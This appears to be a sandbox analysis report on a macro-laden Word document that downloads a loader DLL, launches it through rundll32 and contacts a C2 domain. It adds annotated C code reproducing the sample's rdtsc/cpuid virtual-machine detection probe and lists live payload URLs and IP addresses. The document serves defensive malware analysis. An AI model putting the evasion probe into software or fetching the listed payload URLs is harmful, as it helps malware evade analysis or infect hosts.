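The two intercepted sequences above form one timing probe: rdtsc, then cpuid with eax=1 and ecx=0, then rdtsc again, with a bare rdtsc/rdtsc pair as the baseline. CPUID is unconditionally intercepted by every x86 hypervisor, so each execution costs a VM exit and the tick delta jumps from a few hundred on bare metal to thousands under virtualisation. The C program below is an added example written for this page, not code from the report or from the IcedID sample: it reproduces the probe with the compiler's cpuid.h and x86intrin.h helpers, takes the median of repeated samples, and applies a cut-off. SAMPLES, THRESHOLD and all function names are assumptions (the sample's own threshold is not visible in the report); leaf 1 also returns the hypervisor-present flag in ECX bit 31, which is read here whether or not the sample inspects it.

```c
/* Added example for this page (not code from the report or the sample):
 * the rdtsc ; cpuid(1) ; rdtsc timing probe that Joe Sandbox intercepted
 * in rundll32.exe at 0x180002AE1, reproduced in C.
 * Assumptions (not from the report): SAMPLES, THRESHOLD, all names. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>       /* __cpuid() */
#include <x86intrin.h>   /* __rdtsc() */
#define HAVE_X86 1
#else
#define HAVE_X86 0
#endif

#define SAMPLES   64
#define THRESHOLD 1000ULL   /* assumed cut-off in TSC ticks; tune per host */

/* One probe: TSC before and after CPUID leaf 1 (eax=1, ecx=0), the leaf
 * the intercepted code queries. Returns the tick delta, 0 off x86. */
uint64_t cpuid_cost_once(void)
{
#if HAVE_X86
    unsigned int a, b, c, d;
    uint64_t t0 = __rdtsc();          /* rdtsc; shl rdx,32; or rax,rdx */
    __cpuid(1, a, b, c, d);           /* mov eax,1; xor ecx,ecx; cpuid */
    uint64_t t1 = __rdtsc();          /* second rdtsc */
    (void)a; (void)b; (void)c; (void)d;
    return t1 - t0;
#else
    return 0;
#endif
}

/* Leaf 1 also reports the hypervisor-present flag in ECX bit 31. Sandboxes
 * may mask it, which is why malware adds a timing probe. 0 off x86. */
int cpuid_hypervisor_bit(void)
{
#if HAVE_X86
    unsigned int a, b, c, d;
    __cpuid(1, a, b, c, d);
    (void)a; (void)b; (void)d;
    return (int)((c >> 31) & 1u);
#else
    return 0;
#endif
}

static int cmp_u64(const void *x, const void *y)
{
    uint64_t a = *(const uint64_t *)x, b = *(const uint64_t *)y;
    return (a > b) - (a < b);
}

/* Median of n samples (sorts v in place); robust against the occasional
 * interrupt or first-use cache miss that would skew a plain mean. */
uint64_t median_u64(uint64_t *v, size_t n)
{
    if (n == 0) return 0;
    qsort(v, n, sizeof *v, cmp_u64);
    return v[n / 2];
}

/* Repeat the probe SAMPLES times and return the median delta. */
uint64_t cpuid_cost_median(void)
{
    uint64_t v[SAMPLES];
    for (size_t i = 0; i < SAMPLES; i++)
        v[i] = cpuid_cost_once();
    return median_u64(v, SAMPLES);
}

/* The decision such a check makes: 1 = "virtualised/instrumented". */
int looks_virtualised(uint64_t median_ticks, uint64_t threshold)
{
    return median_ticks > threshold;
}

/* Constructed tick deltas (not measurements from the report) to show
 * the median discarding the 3000-tick outlier: result is 120. */
uint64_t median_of_constructed_samples(void)
{
    uint64_t v[5] = { 900, 50, 3000, 120, 110 };
    return median_u64(v, 5);
}

int main(void)
{
    uint64_t m = cpuid_cost_median();
    printf("hypervisor bit: %d, median rdtsc/cpuid/rdtsc delta: %llu ticks -> %s\n",
           cpuid_hypervisor_bit(), (unsigned long long)m,
           looks_virtualised(m, THRESHOLD) ? "hypervisor likely" : "bare metal likely");
    return 0;
}
```

Build with gcc -O2 and run it once on bare metal and once inside a VM to see the gap. The measured numbers depend on the CPU, the hypervisor and whether the sandbox virtualises the TSC, so THRESHOLD has to be calibrated per environment; the second intercepted pair (rdtsc; rdtsc with no cpuid) is the baseline such a check subtracts before comparing.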

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe  Network Connect: 64.227.108.27 80
Source: C:\Windows\System32\rundll32.exe  Domain query: alexbionka.com
Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe  Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
(Note the image/command-line mismatch: the created process image is rundll32.exe, but its command line begins with the dropper's own path instead of rundll32.exe. A detection that keys on the string "rundll32" in the command line misses this; one that keys on the image path, or on a DLL from %TEMP% invoked by ordinal ",#1", catches it.)
Source: C:\Windows\System32\rundll32.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid (a machine-unique value commonly used as a host identifier)
Source: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe  Code function: 4_2_00761593 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter (the Visual C++ runtime's security-cookie initialisation, not sample-specific logic)
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW (formats computer and user name into a string, consistent with building a host identifier)

Stealing of Sensitive Information

Source: Yara match, file source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
Source: Yara match, file source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

Remote Access Functionality

Source: Yara match, file source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
Source: Yara match, file source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
MITRE ATT&CK matrix (tactics: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact). Techniques carrying signature hits, with the matrix's hit badges reproduced as extracted:

Execution: Command and Scripting Interpreter (2), Scripting (12), Native API (1), Exploitation for Client Execution (33)
Privilege Escalation: Process Injection (111)
Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Process Injection (111), Scripting (12), Obfuscated Files or Information (1), Rundll32 (1)
Discovery: System Time Discovery (1), Security Software Discovery (22), Account Discovery (1), System Owner/User Discovery (1), Remote System Discovery (1), System Network Configuration Discovery (1), File and Directory Discovery (1), System Information Discovery (24)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (14), Non-Application Layer Protocol (3), Application Layer Protocol (123)
Initial Access, Persistence, Credential Access, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects, Impact: no signature hits

Sample detection (Source / Detection / Scanner / Label)
courtesyautomotivedoc08.11.doc  27%  Virustotal
courtesyautomotivedoc08.11.doc  18%  ReversingLabs  Script-Macro.Trojan.Amphitryon
courtesyautomotivedoc08.11.doc  100%  Joe Sandbox ML

Dropped file detection (Source / Detection / Scanner / Label)
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll  100%  Avira  HEUR/AGEN.1251556
C:\Users\user\AppData\Local\Temp\y875E.tmp.dll  100%  Avira  HEUR/AGEN.1251556
C:\Users\user\AppData\Local\Temp\~DF612CB1A14F491B4E.TMP  100%  Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\r9093.tmp.exe  0%  Metadefender
C:\Users\user\AppData\Local\Temp\r9093.tmp.exe  0%  ReversingLabs
Note: r9093.tmp.exe scores 0% with both Metadefender and ReversingLabs, yet it is the process that launches rundll32.exe with y875E.tmp.dll,#1 (see the process creation under HIPS / PFW above) and recurs in the dropped-file context of twenty earlier submissions; a clean scanner verdict on the intermediate launcher says nothing about the chain.

Unpacked PE detection (Source / Detection / Scanner / Label)
5.2.rundll32.exe.7fef7530000.2.unpack  100%  Avira  HEUR/AGEN.1251556
5.2.rundll32.exe.180000000.1.unpack  100%  Avira  HEUR/AGEN.1205098
Domain detection (Source / Detection / Scanner)
alexbionka.com  2%  Virustotal

URL detection (Source / Detection / Scanner / Label)
alexbionka.com  2%  Virustotal
alexbionka.com  0%  Avira URL Cloud  safe
http://alexbionka.com/  2%  Virustotal
http://alexbionka.com/  0%  Avira URL Cloud  safe
http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_c  0%  Avira URL Cloud  safe
http://45.8.146  0%  Avira URL Cloud  safe
http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll  0%  Avira URL Cloud  safe
http://45.8.146.139/fhfty/A2-7QTSJAH4Zf  0%  Avira URL Cloud  safe
http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n  0%  Avira URL Cloud  safe

Domains (Name / IP / Active / Malicious / Antivirus Detection / Reputation)
alexbionka.com  64.227.108.27  true  true  (none)  unknown

URLs (Name / Malicious / Antivirus Detection / Reputation)
alexbionka.com  true  2% Virustotal; Avira URL Cloud: safe  unknown
http://alexbionka.com/  true  2% Virustotal; Avira URL Cloud: safe  unknown
http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll  false  Avira URL Cloud: safe  unknown

URLs found in memory dumps (Name / Source / Malicious / Antivirus Detection / Reputation)
http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_c  r9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmp  false  Avira URL Cloud: safe  unknown
http://45.8.146  rundll32.exe, 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp  false  Avira URL Cloud: safe  low
http://45.8.146.139/fhfty/A2-7QTSJAH4Zf  r9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmp  false  Avira URL Cloud: safe  unknown
http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n  rundll32.exe, 00000005.00000002.944141742.0000000000594000.00000004.00000020.00020000.00000000.sdmp  false  Avira URL Cloud: safe  unknown

Note on the reputation columns: the loader URL on 45.8.146.139 is "safe" in Avira URL Cloud, 0% at every scanner and "Malicious: false" here, while the file it served (the 360448-byte PE32+ DLL in the dropped-file list whose IE Cache URL is exactly this path) is detected 100% by Avira and marked Malicious: true. The URL verdict is a false negative; treat 45.8.146.139 as a payload host and the full URL path as an indicator regardless of its reputation score. Several of the memory-dump URLs are truncated strings from partially overwritten buffers and are reproduced as extracted.
Contacted IPs (IP / Domain / Country / ASN / ASN Name / Malicious)
45.8.146.139  unknown  Russian Federation  44676  VMAGE-ASRU  false
64.227.108.27  alexbionka.com  United States  14061  DIGITALOCEAN-ASNUS  true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 682567
Start date and time: 2022-08-11 17:37:25 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 58s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: courtesyautomotivedoc08.11.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@5/14@2/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 80% (good quality ratio 61.6%)
• Quality average: 58.3%
• Quality standard deviation: 38.9%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 28
• Number of non-executed functions: 23
Cookbook Comments:
• Found application associated with file extension: .doc
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtQueryAttributesFile calls found.

Sandbox interventions (Time / Type / Description)
17:38:35  API Interceptor  1x Sleep call for process: rundll32.exe modified
IP context (Match / Associated Sample Name or URL / Detection / Context)
45.8.146.139
  drinkcodeblue.file.08.11.22.doc  malicious  45.8.146.139/fhfty/IJQ_OLG8QW9DFH32ZO8BOJQ-PC_3SXMS/rm
  dodsonimaging,file,08.11.2022.doc  malicious  45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
  feltenberger doc 08.11.doc  malicious  45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
  agsilverfile08.11.doc  malicious  45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll
64.227.108.27
  drinkcodeblue.file.08.11.22.doc  malicious  alexbionka.com/
  6bd7001f4c269babd8470173c5176e31627fc97335cd9.dll  malicious  alexbionka.com/
  ba5d10b61c66694419d31843cba8393a424b660df544f.dll  malicious  alexbionka.com/
  dodsonimaging,file,08.11.2022.doc  malicious  alexbionka.com/
  aaffd5e2c3e894a71e9403fefc9b616d4786dc566e961.dll  malicious  alexbionka.com/
  9d2a43276a3414bc1983c4f2546d5494b8c814bddf2dc.dll  malicious  alexbionka.com/
  feltenberger doc 08.11.doc  malicious  alexbionka.com/
  agsilverfile08.11.doc  malicious  alexbionka.com/
  giveThereWhichCouldHis.dll  malicious  qropalhouse.com/
Domain context (Match / Associated Sample Name or URL / Detection / Context)
alexbionka.com
  drinkcodeblue.file.08.11.22.doc  malicious  64.227.108.27
  6bd7001f4c269babd8470173c5176e31627fc97335cd9.dll  malicious  64.227.108.27
  ba5d10b61c66694419d31843cba8393a424b660df544f.dll  malicious  64.227.108.27
  dodsonimaging,file,08.11.2022.doc  malicious  64.227.108.27
  aaffd5e2c3e894a71e9403fefc9b616d4786dc566e961.dll  malicious  64.227.108.27
  9d2a43276a3414bc1983c4f2546d5494b8c814bddf2dc.dll  malicious  64.227.108.27
  feltenberger doc 08.11.doc  malicious  64.227.108.27
  agsilverfile08.11.doc  malicious  64.227.108.27
ASN context (Match / Associated Sample Name or URL / Detection / Context)
DIGITALOCEAN-ASNUS
  drinkcodeblue.file.08.11.22.doc  malicious  64.227.108.27
  6bd7001f4c269babd8470173c5176e31627fc97335cd9.dll  malicious  64.227.108.27
  ba5d10b61c66694419d31843cba8393a424b660df544f.dll  malicious  64.227.108.27
  dodsonimaging,file,08.11.2022.doc  malicious  64.227.108.27
  aaffd5e2c3e894a71e9403fefc9b616d4786dc566e961.dll  malicious  64.227.108.27
  9d2a43276a3414bc1983c4f2546d5494b8c814bddf2dc.dll  malicious  64.227.108.27
  feltenberger doc 08.11.doc  malicious  64.227.108.27
  agsilverfile08.11.doc  malicious  64.227.108.27
  6220_719_pdf.exe  malicious  157.230.46.114
  https://express.adobe.com/page/lSwpTTu5FfBJB/  malicious  103.253.144.208
  3195021pdf.exe  malicious  157.230.46.114
  https://express.adobe.com/page/lSwpTTu5FfBJB/  malicious  103.253.144.208
  https://express.adobe.com/page/lSwpTTu5FfBJB/  malicious  103.253.144.208
  Secpralpro Order Q3 FTD52535345675 .vbs  malicious  157.245.84.137
  https://app.getresponse.com/click.html?x=a62b&lc=SNTQlu&mc=It&s=BIUpUo1&u=wkqNo&z=Ey5btDo&  malicious  178.128.135.233
  https://oymlnc.sofie.cloud/download-file/4990a846-fff5-4c7e-a605-5c3216654216  malicious  142.93.97.249
  giveThereWhichCouldHis.dll  malicious  64.227.108.27
  aqua.mpsl  malicious  178.62.131.198
  aqua.ppc  malicious  159.203.164.16
  http://polleev.com/  malicious  159.65.180.165
VMAGE-ASRU
  drinkcodeblue.file.08.11.22.doc  malicious  45.8.146.139
  dodsonimaging,file,08.11.2022.doc  malicious  45.8.146.139
  feltenberger doc 08.11.doc  malicious  45.8.146.139
  agsilverfile08.11.doc  malicious  45.8.146.139
  GitmEGG60Q.exe  malicious  45.159.251.68
  80J4pAFU0A.exe  malicious  45.159.248.53
  Rwwsr82vkS.exe  malicious  45.159.248.53
  sJq1pykxns.exe  malicious  45.159.248.53
  3RkGCbnoKw.exe  malicious  45.159.248.53
  60MLnq8Uma.exe  malicious  45.159.248.53
  uGfpJynSWM.exe  malicious  45.159.249.4
  MqYQkpHt4V.exe  malicious  45.159.248.53
  0LYwkmJsgj.exe  malicious  45.159.248.53
  P5u1ZAL6wF.exe  malicious  45.159.248.53
  VbeTpPMvvK.exe  malicious  45.159.248.53
  e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exe  malicious  45.159.248.53
  aTlGCwT504.exe  malicious  45.159.248.53
  a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exe  malicious  45.159.248.53
  lFqE59erhf.exe  malicious  45.8.144.151
  eW9zvrPzHg.exe  malicious  45.159.251.105
    No context
Dropped file context (Match / Associated Sample Name / Detection)
C:\Users\user\AppData\Local\Temp\r9093.tmp.exe
  drinkcodeblue.file.08.11.22.doc  malicious
  dodsonimaging,file,08.11.2022.doc  malicious
  feltenberger doc 08.11.doc  malicious
  agsilverfile08.11.doc  malicious
  ino.file.18.07.2022.doc  malicious
  md-srl.doc.29.07.22.doc  malicious
  [redacted]-document-26.07.22.doc  malicious
  [redacted]-doc-26.07.doc  malicious
  confinalp.file.26.07.22.doc  malicious
  alhena-doc-26.07.2022.doc  malicious
  andreademarchi invoice 26.07.22.doc  malicious
  technographsri invoice 26.07.2022.doc  malicious
  377155250.doc  malicious
  pelagagge_doc_22.07.22.doc  malicious
  12658371_dynamicom-invoice-18.07.22.doc  malicious
  [redacted],file,18.07.doc  malicious
  istitutomargherita.file.18.07.doc  malicious
  gruppobluecity invoice 18.07.22.doc  malicious
  bbdy_document_07.06.2022.doc  malicious
  tcrc-central-le file 07.01.22.doc  malicious
The same r9093.tmp.exe was dropped by all twenty of these earlier submissions, dated June to August 2022, so its hash is a reusable indicator for the whole set even though the scanners above rate it 0%.
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: downloaded
Size (bytes): 360448
Entropy (8bit): 4.669486804663653
Encrypted: false
SSDEEP: 6144:tYCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:eCwMfjSlE+A4eguRJDtPZIG46FkEH9
MD5: CE600629752CAF6529025A0EE60FB7B3
SHA1: 8D8DDA1D4FF66D6B5BB44F7BAFDC87EBB9B54DE6
SHA-256: BDB9DAB286CCCCF1D315A027597065C51DC4BF0A87471B283FE749C146721C05
SHA-512: 4D2AC51A9AB38DCE21895A22878F6533C27371302A2F35C0F337FE05C3021CAA838D80C76DC7E4CA44D47E962973B52F2B4AA4C7BCD10E662DEA6C1645C05FE9
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
Reputation: low
IE Cache URL: http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
Note: the downloading process is WINWORD.EXE itself and the file landed in the Content.IE5 cache, so the macro fetched the DLL through the WinINet/URLMon cache rather than through a separate downloader. An entropy of 4.67 shows the x64 DLL is not packed or encrypted as a whole on disk. The DLL that rundll32.exe is later launched with, C:\Users\user\AppData\Local\Temp\y875E.tmp.dll, carries the same Avira label (HEUR/AGEN.1251556).
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: PNG image data, 636 x 613, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 113730
Entropy (8bit): 7.990292786537194
Encrypted: true
SSDEEP: 3072:ShIiMUFV26oUc72Dl+oj/Yc6oGqdxVJw0c8N2mirB0VZp:ShMggmEceUi8N2miK/
MD5: E0B30095BE35E9494E5073277D4FC1A1
SHA1: 19D39B036989A331F5389E377FBE565436599894
SHA-256: EA952A68D25232D981CDBE0CD6DA947A9386D4BFFD5D1BE2EF80C4A1246AC3E2
SHA-512: A524907D5D60AA77DB0BA3A3BF114EA7F8AEA9190ADAA84A0C78F96EC8E333AB124D68C84863E83E735D602117B0F3422746C9C4A0D6823CC8B51B652C41972E
Malicious: false
Reputation: low
                                            Preview:.PNG........IHDR...|...e......V.R.. .IDATx.....4.......~..:..t."...$......d..+...%Y.,V.(...7...03"""..O.......?>..y.}.v.&u......?0.....g.NH.............F...$..H.........km.%"D .=.f;..........A....O..w..,"n...U....N~?".....'...7w)A..l.+.....7....q|..q.7?............v.f...6....x._<.On.WLm..>s<.-....."............"_..~a....f=..7.....P.~...,gD..:.P..,.*.....c...;.B...q..1.>|.....R.7m...7.......,".p7%.M.".:...9..P.8.!..?.... .)".......A..Z..rA.).g.7..'QD.......@$.....*..oC. .6w...lP...lN..1X...H.................q....X{.s..A......w..I....l`..t.C87.p.k...H>r...).,..n...Dd.R.c..xHs.nWv.......>.j.WCi........a...}.t\_....A.q..t..^A..Q..g.,..P.h.n.nm....7....YYT.............jl.....yR>s...w......|.z..L.....\.FP.....QG...0.....2...@T.*....C.....M...;...i....Y8...R.Y*....~.;.CA........q....6`......~......2.g."...../..{x.( ...o..p...YW&+//[...........]....h....s....&...m_.)tG...s....<...].R..w..!.....A;.....I.,\.I@...&.....0[.\a?..`.#2upVW.4.{..c.JMZ..
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 256595
Entropy (8bit): 7.978435362250102
Encrypted: false
SSDEEP: 6144:qvnabj6CLx2b5lq77EL8D+NXLfaeW8JftIyhQfWS:Xbj6MxGPfq8SeS
MD5: F99413369967D6AA9F566F87F36181E7
SHA1: 1BA1EB934E7F34344F99E558F6CE4723A13B375D
SHA-256: F9CED4D80492BC27EBCE86308AF62DC228A5BDAB865F067F6869E74DD83EC6CF
SHA-512: 496ED10D5FFF3930C309B387042130CA94747F4ECDA72779772F73E7B1BF379411E76088EA8DC9A589085C91A18A30E9BE5D35FA4A8D85A01FB1C7FDD0DE7487
Malicious: false
Reputation: low
                                            Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^.....GU..,..:.=..3x.Q.!..AQ....... ..AA.!...fNB..C..@H..2H.......FA..!.Iw.w.I.Bz..}..z...J.....OR]U.V.........jp..%j.....A...e...*..o.mZu-.x..p.....M..Py.mx...Y......5\Q.2=...I.5\...."y+..RNO..t......ZT..OOF.u.~.......,.._y*..W...g..m=@.Od...IZ.K.6o.k]z<.**...C.O..VN....6.We.<m~.0V...o..z..@........L..A.-?y....1..EK..z.c...7i5.:..@..a......~.....X.....:....pE.S}..SQ..+..K7......?..C/..9....Si...%.4..[i-_u..+z.=.Y.........|m..{.<=.V.[.i....m.DK_)..p..,....t..W?Q.c<.Z...5.HZ...p:P..r.p.V$...S.W.3.h..-..7y2...Z..+.oQ..Ok..W..WZ".9@..6..$},}%...z..^][T..U......=z.g=.D.U~....H....].S.t`V<icu.../...R...[.-o..C/...o........Yi ......|`,..6....Goi..Z..1.D.k....Tb.4.........W..d.Mo.....je..z......m.6.WQ...[."i..X...ZT..O....{4....[dz.kQ.-o/\i..>P.Y.....x..xu..AK...W..D...+.W@...cy.x............a0....W.._.-*..V7.5=.-.:..{.2...p..5..O..W.K..^ZE.g.t
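The "Entropy (8bit)" figure in each dropped-file entry is the Shannon entropy of the file's byte distribution, and the two PNG entries above show how close the "Encrypted" flag's cut-off sits to the 8.0 ceiling: 7.990 is flagged true, 7.978 false, while the 4.67 of the unpacked loader DLL is nowhere near it. The C program below is an added example written for this page, not Joe Sandbox code; it computes the same statistic and applies a flag. ENCRYPTED_THRESHOLD (7.98) is an assumption chosen only to agree with those two PNG entries, not Joe Sandbox's documented value, and the sample inputs are constructed here rather than taken from the report's files; log2 is implemented locally so the file builds without libm.

```c
/* Added example for this page (not code from Joe Sandbox): 8-bit Shannon
 * entropy of a byte buffer plus an "Encrypted"-style flag.
 * Assumptions (not from the report): ENCRYPTED_THRESHOLD, all names,
 * and the constructed inputs below. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ENCRYPTED_THRESHOLD 7.98   /* assumed; consistent with 7.990 -> true, 7.978 -> false */

/* log2(x) for x > 0 without <math.h>: split x into mantissa m in [1,2) and
 * exponent e, then ln(m) = 2*atanh((m-1)/(m+1)) by series (|z| <= 1/3, so
 * 20 odd terms reach double precision). Exact for powers of two. */
static double log2_pos(double x)
{
    uint64_t bits;
    memcpy(&bits, &x, sizeof bits);
    int e = (int)((bits >> 52) & 0x7FF) - 1023;
    bits = (bits & 0x000FFFFFFFFFFFFFULL) | 0x3FF0000000000000ULL;
    double m;
    memcpy(&m, &bits, sizeof m);
    double z = (m - 1.0) / (m + 1.0), z2 = z * z, term = z, s = 0.0;
    for (int k = 1; k < 40; k += 2) { s += term / k; term *= z2; }
    return (double)e + 2.0 * s / 0.6931471805599453;   /* divide ln(m) by ln 2 */
}

/* H = -sum p_v * log2(p_v) over the 256 byte values: 0.0 for a buffer of
 * one repeated byte, 8.0 when all 256 values are equally frequent. */
double shannon_entropy(const uint8_t *buf, size_t len)
{
    if (len == 0) return 0.0;
    size_t counts[256] = {0};
    for (size_t i = 0; i < len; i++) counts[buf[i]]++;
    double h = 0.0;
    for (int v = 0; v < 256; v++) {
        if (counts[v] == 0) continue;
        double p = (double)counts[v] / (double)len;
        h -= p * log2_pos(p);
    }
    return h;
}

/* The flag: compressed or encrypted data sits just under the 8.0 ceiling. */
int looks_encrypted(double entropy)
{
    return entropy >= ENCRYPTED_THRESHOLD;
}

/* Constructed inputs (not bytes from the report's files). */
double entropy_zero_block(void)        /* CDF-style zero padding -> 0.0 */
{
    uint8_t buf[4096] = {0};
    return shannon_entropy(buf, sizeof buf);
}

double entropy_byte_ramp(void)         /* every value once -> the 8.0 ceiling */
{
    uint8_t buf[256];
    for (int i = 0; i < 256; i++) buf[i] = (uint8_t)i;
    return shannon_entropy(buf, sizeof buf);
}

double entropy_dos_stub(void)          /* plain ASCII text -> roughly 4 bits */
{
    static const char stub[] = "This program cannot be run in DOS mode.";
    return shannon_entropy((const uint8_t *)stub, sizeof stub - 1);
}

int main(void)
{
    printf("zero block: %.3f  ramp: %.3f  DOS stub: %.3f\n",
           entropy_zero_block(), entropy_byte_ramp(), entropy_dos_stub());
    printf("PNG 7.990 -> encrypted=%d, PNG 7.978 -> encrypted=%d, DLL 4.669 -> encrypted=%d\n",
           looks_encrypted(7.990292786537194), looks_encrypted(7.978435362250102),
           looks_encrypted(4.669486804663653));
    return 0;
}
```

Whole-file entropy is a coarse triage signal: a compressed PNG and an encrypted payload both score close to 8.0, which is why both PNGs here sit within 0.02 of the cut-off and one lands on each side. Per-section or sliding-window entropy over a PE separates a packed .text from a legitimately compressed resource far better than the single number a report carries.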
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 12288
Entropy (8bit): 5.6813929110754575
Encrypted: false
SSDEEP: 192:XVKterkAle/rhCUxyi5aStkqkAle/rhCUxyi5aaK:Yt8kAle/l5Eint7kAle/l5Ei
MD5: 50DFFBAE40D88AC9BCE9B8764F700AF1
SHA1: 96CBDA6A084FEA97C3AF81199E1E37BEC442068B
SHA-256: D48610288DC5FAA1C9604941C27291F911135D91B17F0CFFE351B382A5133E4C
SHA-512: 624AC8EC22A5C98318780BBF931971B4BA39CDD7D65DE9E680692D9F37DBFDEE98DAF4E6EFBE2C128963DBEA199EF3094F68426D2B64FBC104FDDDCAA9868D0B
Malicious: false
Reputation: low
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1536
                                            Entropy (8bit):2.1282331468038365
                                            Encrypted:false
                                            SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lpakwkvPlI4Vle4S4Pll4eHkUZD/W4c:4LG1ND9Pxn82+kszJYtHsz
                                            MD5:F8CC4A5272D7AFF36E2EFF7EFD02E883
                                            SHA1:C4477C54081C7C2350D5DD090C9E18AF0693EEA2
                                            SHA-256:34ED4911C503F7AA0E4AFDA33EE4CFAD41E84EE533C92CDC6C061D1780D3FB59
